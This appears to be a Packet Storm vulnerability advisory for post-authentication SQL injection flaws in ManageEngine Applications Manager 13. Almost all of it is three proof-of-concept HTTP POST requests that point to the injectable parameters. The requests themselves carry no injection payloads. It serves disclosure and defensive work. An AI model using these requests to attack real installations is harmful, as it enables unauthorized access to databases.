Zoho ManageEngine Applications Manager 13 SQL Injection

2017-11-06T00:00:00
ID PACKETSTORM:144892
Type packetstorm
Reporter Cody Sixteen
Modified 2017-11-06T00:00:00

Description

                                        
                                            `ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities.  
  
  
Proof of Concept 1 (name= parameter is susceptible):  
  
POST /manageApplications.do?method=insert HTTP/1.1  
Host: 192.168.1.190:9090  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,pl;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 407  
Referer: http://192.168.1.190:9090/admin/createapplication.do?method=createapp&grouptype=1  
Cookie: testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJESNNXc4I4Ts1omY%2FiCOo47Ch6sZEoC7bRr4SfuGTOVfjv2JZAH6cun8; liveapm-_zldt=cfa03604-1dc4-4155-86f7-803952114141; diagnosticsAlarmTable_sortdir=down; JSESSIONID_APM_9090=A16B99B2C0C09EB6060B4372660CFBC3  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
org.apache.struts.taglib.html.TOKEN=66ef9ed22c8b3a67da50e905f7735abd&addmonitors=0&name=My+App2&description=Description....This+service+is+critical+to+our+business&grouptype=1&mgtypestatus%231001=on&mgtypes_1001=1&mgtypes_1007=0&mgtypes_1008=0&mgtypestatus%231002=on&mgtypes_1002=1&mgtypestatus%231003=on&mgtypes_1003=1&mgtypestatus%231004=on&mgtypes_1004=1&mgtypestatus%231006=on&mgtypes_1006=1&locationid=  
  
  
Proof of Concept 2 (crafted viewProps yCanvas field):  
  
POST /GraphicalView.do? HTTP/1.1  
Host: 192.168.1.191:9090  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,pl;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.1.191:9090/GraphicalView.do?&method=createBusinessService  
Content-Length: 457  
Cookie: JSESSIONID_APM_9090=53E8EBC71177607C3A7FE03EB238887E  
Connection: close  
  
&method=saveBusinessViewPropsForADDM&viewProps={"displayProps":{"showLabel":true,"showOnlyMGs":false,"showOnlyTopMGs":false,"showOnlyCritical":false,"showOnlyMGStatus":false,"backgroundColorVal":"#FFFFFF","lineColorVal":"#888c8f","textColorVal":"#444444","lineThickness":"2.5","lineTransparency":1,"xCanvas":-23.089912210349002,"yCanvas":0},"coordinates":"{\"totalNumberOfNodes\":0,\"nodeIdList\":[]}"}&haid=10000106&nodeIdVsResourceId={"node_1":"10000106"}  
  
  
Proof of Concept 3:  
  
POST /GraphicalView.do HTTP/1.1  
Host: 192.168.1.191:9090  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,pl;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.1.191:9090/showapplication.do?haid=10000106&method=showApplication&selectM=flashview&viewid=1  
Content-Length: 101  
Cookie: JSESSIONID_APM_9090=68C19C45D63C6FD102EB3DF25A8CE39D; testcookie=; am_username=; am_check=; am_mgview=availability  
Connection: close  
  
method=getLatestStatusForJIT&haid=10000106&viewid=1&currentime=1509869908111&resourceIDs=(0000106,0)  
  
`